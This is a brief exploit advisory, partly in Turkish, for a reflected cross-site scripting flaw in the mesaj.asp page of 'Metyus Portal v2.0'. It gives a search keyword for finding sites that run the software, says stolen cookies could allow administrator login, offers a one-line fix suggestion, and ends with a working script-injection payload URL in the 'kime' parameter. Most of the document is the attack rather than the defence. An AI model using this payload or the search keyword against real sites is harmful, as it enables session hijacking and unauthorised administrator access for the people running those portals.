< ------------------- header data start ------------------- >

#############################################################

# Application Name : Metyus Portal v2.0

# Vulnerable Type : XSS Vulnerability

# Google Keyword : Metyus Portal v2.0

# Infection : Cookie bilgilerine erisilerek sisteme yönetici yetkileri ile giris yapilabilir.

# Bug Fix Advice : mesaj.asp dosyasindaki tüm Request.Querystring degiskenleri (html encode, Hex vb.) filtrelenmelidir.

# author : CyberGhost

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/mesaj.asp?durum=gonder&nasi=cevapla&kime=><script>alert(’CW Lojistik / Bug Researchers’)</script>

< -- bug code end of -- >